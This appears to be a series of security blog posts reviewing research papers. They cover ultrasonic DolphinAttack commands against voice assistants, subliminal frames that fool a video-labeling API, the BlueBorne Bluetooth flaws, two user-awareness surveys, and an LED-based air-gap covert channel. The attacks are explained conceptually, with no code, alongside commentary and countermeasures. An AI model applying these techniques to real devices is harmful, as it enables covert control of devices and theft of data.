DolphinAttack or How To Stealthily Fool Voice Assistants

Six researchers from the Zhejiang University published an excellent paper describing DolphinAttack: a new attack against voice-based assistants such as Siri or Alexa. As usual, the objective is to force the assistant to accept a command that the owner of the assistant did not issue. The attack is more powerful if the owner does not detect its occurrence (excepted, of course, the potential consequences of the accepted command). The owner should not hear a recognizable command or even better hear nothing.

Many attacks try to fool the Speech Recognition system by finding characteristics that may fool the machine learning system that powers the recognition without using actual phonemes. The proposed approach is different. The objective is to fool the audio capturing system rather than the speech recognition.

Humans do not hear ultrasounds, i.e., frequencies greater than 20 kHz. Speech is usually in the range of a few 100 HZ up to 5 kHz. The researchers’ great idea is to exploit the characteristics of the acquisition system.

  1. The acquisition system is a microphone, an amplifier, a low-pass filter (LPF), and an analog to digital converter (ADC), regardless of the Speech Recognition system in use. The LPF filters out the frequencies over 20 kHz and the ADC samples at 44.1 kHz.
  2. Any electronic system creates harmonics due to non-linearity. Thus, if you modulate a signal of fm
    with a carrier at fc, in the Fourier domain, many harmonics will appear such as fC – fm, fC + fm¸ and
    fC as well as their multiples.

You may have guessed the trick. If the attacker modulates the command (fm) with an ultrasound carrier fc, then the resulting signal is inaudible. However, the LPF will remove the carrier frequency before sending it to the ADC. The residual command will be present in the filtered signal and may be understood by the speech recognition system. Of course, the commands are more complicated than a mono-frequency, but the system stays valid.

They modulated the amplitude of a frequency carrier with a vocal command. The carrier was in the range 20 kHz to 25 kHz. They experimented with many hardware and speech recognition. As we may guess, the system is highly hardware dependent. There is an optimal frequency carrier that is device dependent (due to various microphones). Nevertheless, with the right parameters for a given device, they seemed to have fooled most devices. Of course, the optimal equipment requires an ultrasound speaker and adapted amplifier. Usually, speakers have a response curve that cut before 20 kHz.

I love this attack because it thinks out of the box and exploits “characteristics” of the hardware. It is also a good illustration of Law N°6: Security is not stronger than its weakest link.

A good paper to read.

 

Zhang, Guoming, Chen Yan, Xiaoyu Ji, Taimin Zhang, Tianchen Zhang, and Wenyuan Xu. “DolphinAttack: Inaudible Voice Commands.” In ArXiv:1708.09537 [Cs], 103–17. Dallas, Texas, USA: ACM, 2017. http://arxiv.org/abs/1708.09537

 

Picture by http: //maxpixel.freegreatpicture.com/Dolphin-Fish-Animal-Sea-Water-Ocean-Mammal-41436

 

 

Subliminal images deceive Machine Learning video labeling

Current machine learning systems are not designed to defend against malevolent adversaries. Some teams succeeded already to fool image recognition or voice recognition. Three researchers from the University of Washington fooled the Google’s video tagging system. Google offers a Cloud Video Intelligence API that returns the most relevant tags of a video sequence. It is based on deep learning.

The idea of the researchers is simple. They insert the same image every 50 frames in the video. The API returns the tags related to the added image (with an over 90% high confidence) rather than the tags related to the forged video sequence. Thus, rather than returning tiger for the video (98% of the video time), the API returns Audi.

It has never been demonstrated that subliminal images are effective on people. This team demonstrated that subliminal images can be effective on Machine Learning. This attack has many interesting uses.

This short paper is interesting to read. Testing this attack on other APIs would be interesting.

Hossein, Hosseini, Baicen Xiao, and Radha Poovendran. “Deceiving Google’s Cloud Video Intelligence API Built for Summarizing Videos.” arXiv, March 31, 2017. https://arxiv.org/abs/1703.09793

BlueBorne

Ben Seri and Gregory Vishnepolsky from the society armis recently disclosed eight vulnerabilities present in various BlueTooth stacks. Their paper “The dangers of Bluetooth implementations: Unveiling zero day vulnerabilities and security flaws in modern Bluetooth stacks” thoroughly describes these vulnerabilities and derives some interesting lessons.

Some vulnerabilities may allow taking control of the Bluetooth device. These exploits do not need the target to be in discoverable mode. They just need to know the Bluetooth MAC address (BDADDR). Contrary to common belief, it is guessable even for non-discoverable devices. If the target generates Bluetooth traffic, then it BDAADR is visible in the access code. If it is not generating traffic, the widely accepted convention to use the same MAC address for Wifi than for Bluetooth may reveal it.

Once the attacker knows the BDADDR, he can use the exploits. One powerful vulnerability is due to some lack of implementation guidelines in the specifications for the “Just Works” authentication. For Android and Windows, if the attacker claims to be “No Input No output, No Man in the middle protection required and no bonding,” the target stealthily accepts the connection with limited security capabilities for a short period of time (due to the no bonding). Of course, any service that would require MiTM protection or bonding, and verifies the requirement, will refuse to operate over such connection. For Apple, the connection requests a validation by the user.

Once the attacker is linked to the unknowing target, it can try many attacks. My preferred ones are CVE-2017-0783 and CVE-2017-8628. They use a flaw in the specification of the Personal Area Network (PAN). This service has a low-level security requirement. This means that the previous attack grants access to the PAN without any authorization! The attacker can mount a pineapple attack over Bluetooth without the target being aware. In a Wifi Pineapple, the attacker impersonates an already known WIFI public network and can act as a man in the middle. In this case, the pineapple does not need to be a known network. Redoutable.

The PAN specification dated from 2003 and was never since revised. “Just works” and the newer authentication protocols were specified more recently. They changed the trust model and trust context. The older specifications were not analyzed to identify potential impacts.

The other vulnerabilities allow either buffer overflows or data leakage by exploring more than the attributed spaces.

The disclosure was part of a coordinated disclosure with Google, Microsoft, and Linux kernel team.

Conclusion: Verify that you installed the August and September security patches for your devices. They contain patches to these vulnerabilities.

 

French users seem aware of the risks and threats of illicit sites

The French HADOPI recently published an interesting paper “Etude sur les risques encourus sur les sites illicites,” i.e., a study on the risks incurred on illegal sites. They polled 1,021 Internet users older than 15. The first part of the study analyses the reported use of so-called illicit sites. The second part checks the awareness of these users of the associated risks.

The first part is very conventional and shows information that was already known for other markets. The results are neither surprising nor widely deviating from other countries. For instance, without surprise, the younger generations use more illicit sharing sites than the oldest ones.

Figure extracted from the report. In black, my proposed translation.

Music, movies and TV shows are the categories that are the most illicitly accessed.

The second part is more interesting than the first one. Most polled users claim to know the threats of Internet (scareware, spam, the slowdown of computer due to malware, adult advertisement, and change of browser’s settings) as well as the issues (theft of banking account, identity theft, scam, or ransomware). Nevertheless, the more using illicit content, the higher the risk of nuisance and prejudice. Not surprisingly, 60% of consumers who stopped using illicit content suffered at least on serious prejudice.

Figure extracted from the report. In black, my proposed translation.

Users seem to understand that the use of illicit content seriously increases the risks. Nevertheless, there is a distortion. The nuisance is more associated to illegal consumption than actual real prejudices.

Figure extracted from the report. In black, my proposed translation

The top four motivation of legal users is to be lawful (66%), fear of malware (51%), respect for the artists (50%) and a better product (43%). For regular illicit users, the top three motivation to use legal offer is a better quality (43%), fear of malware (42%) and being lawful (41%). 57% of illicit users claim that they intend to reduce or stop using illegal content. 39% of illicit users announce that they will not change their behavior. 4% of illicit users claim they plan to consume more illicit content.

We must always be cautious with the answers to a poll. Some people may not be ready to disclose their unlawful behavior. Therefore, the real values of illicit behavior are most probably higher than disclosed in the document. Polled people may also provide wrong answers. For instance, about 30% of the consumers is illicitly consuming software claim to use streaming! Caution should also apply to the classification between streaming and P2P. Many new tools, for instance, Popcorn time, use P2P but present a behavior similar to streaming.

Conclusion of the report

Risks are present on the Internet. Illicit users are more at risk than lawful users.

Users acknowledge that illicit consumption is riskier than legal consumption.

Legal offer is perceived as the safe choice.

Having been hit by a security problem pushes users towards the legal offer.

An interesting report, unfortunately, currently it is only available in French.

 

 

What the Public Knows About Cybersecurity

In June 2016, The US Pew Research Center asked 1,055 US adults 13 questions to evaluate their knowledge about cyber security. The questions were ranging from identifying a suitable password to identifying a two-factor authentication system.

The readers of this blog would belong to the 1% of the sample (i.e., 11 individuals) who made no mistake. To be honest, the non-US readers may fail at the question related to US credit score (“Americans can legally obtain one free credit report yearly from each of the three credit bureaus.” This question is not directly related to cybersecurity and is purely US-related. I must confess that before moving to the US, I would have had no ideas of the right answer)

Not surprisingly, the success ratio was low. The average number of correct answers was 5.5 for 13 asked questions! ¾ of interviewees correctly identified a strong password. About half of the individuals accurately spotted a simple phishing attack. Only 1/3 knew that https means the connection is encrypted.

There was a clear correlation between the level of education and the ratio of proper answers. Those with college degrees or higher had an average of 7 right answers. The impact of the age was less conclusive.

You may take the quiz.

Lessons:

The results are not a surprise. We do not see an increase of awareness. This study should be a reminder that we, the security practitioners, must educate people around us. It is our civic responsibility and duty. This education is the first step towards a more secure connected world. Without it, the connected world will become a hell for most people.

The paper may be useful in your library

Ref:

Olmstead, Kenneth, and Aaron Smith. “What the Public Knows About Cybersecurity,” March 22, 2017. http://assets.pewresearch.org/wp-content/uploads/sites/14/2017/03/17140820/PI_2017.03.22_Cybersecurity-Quiz_FINAL.pdf

Malware Lets a Drone Steal Data by Watching a Computer’s Blinking LED

This news initially published by Wired has made the headlights of many news and blogs. Thus, I had to dive in and read the paper. This team already disclosed in the past the use of some covert channels such as temperature. Three researchers, GURI M., ZADOV B., and ELOVICI Y. have devised a new way to breach airgap. They use the hard-drive (HDD) LED as a covert channel. By reading from the hard drive with a given sequence, it is possible to control the LED without having to be a privileged user. The reading sequence modulates the emitted light that carries the covert channel.

They experimented with several normal computers and concluded that they were able to reach about 4K bit/s by reading 4KB sectors. Obviously, such throughput does require special equipment to record the blinking LED. Typical video cameras will not allow more than 15 bit/s depending on their frame per second (fps). Do not forget Shannon’s theorem about sampling. Thus, they used a photodiode or a specialized amplified light detectors. Only such kind of equipment can guarantee a good detection rate.

Using the HDD reading for a covert channel is not a new method. At Black Hat 2008, FILIOL E. et al. disclosed such attack but they used the clicking of the hard HDD, i.e., acoustic channel, rather than the LED, i.e., optical channel. This is an interesting presentation of many covert channels.

The new attack is nice and adding the drone component guarantees the buzz. Nevertheless, I believe it is not as dangerous as publicized. The issue is the malware itself. The malware has to be the exclusive entity accessing the HDD during the transmission. Indeed, if any concurrent process uses the HDD, it will mess up with the emitted message. Therefore, the researchers recommend turning off the disk caching (drop_caches for Linux). What is the likelihood that an air-gapped computer can run a malware as the exclusive process without being noticed? One of the characteristics of the malware is that it should be stealthy, thus probably not being alone to access the HDD.

The second issue is the synchronization with the spying eyes. The evil maid scenario (or evil drone) does not seem realistic. The malware should execute only during the presence of the spy; else it will be noticed (due to the exclusivity of access to HDD). The spy cannot signal its presence to the malware as the malware is air gapped thus cannot receive any incoming message. Thus, either they have to define in advance some rendez-vous, or the malware has to run repeatedly for a long period, i.e., reducing its stealthiness. If the spying device is “fixed,” using cameras is not realistic due to their low bandwidth, thus requesting the malware to run for long periods. Nevertheless, the spy may have installed special equipment and record everything and analyze later the recorded light and look for the malware sequences when the malware wakes up and plays. The spying device will have to exfiltrate stealthily a far larger message than the covert message, increasing the risk to be detected.

The attack is possible but seems more complex than what is publicized. The paper’s proposed countermeasures disclose the defense:

Another interesting solution is to execute a background process that frequently invokes random read and write operations; that way, the signal generated by the malicious process will get mixed up with a random noise, limiting the attack’s effectiveness.

As already told, I believe that in most cases, more than one process will be executing and accessing the HDD. If you are paranoid, you can always hide the LED. 

Reference:

Guri, Mordechai, Boris Zadov, and Yuval Elovici. “LED-It-GO Leaking a Lot of Data from Air-Gapped Computers via the (Small) Hard Drive LED,” February 2017. http://cyber.bgu.ac.il/advanced-cyber/system/files/LED-it-GO_0.pdf

Calmette, Vincent, Stephane Vallet, Eric Filiol, and Guy Le Bouter. “Passive and Active Leakage of Secret Data from Non Networked Computer.” Black Hat 2008, Las Vegas, NV, USA, 2008. https://www.researchgate.net/publication/228801499_Passive_and_Active_Leakage_of_Secret_Data_from_Non_Networked_Computer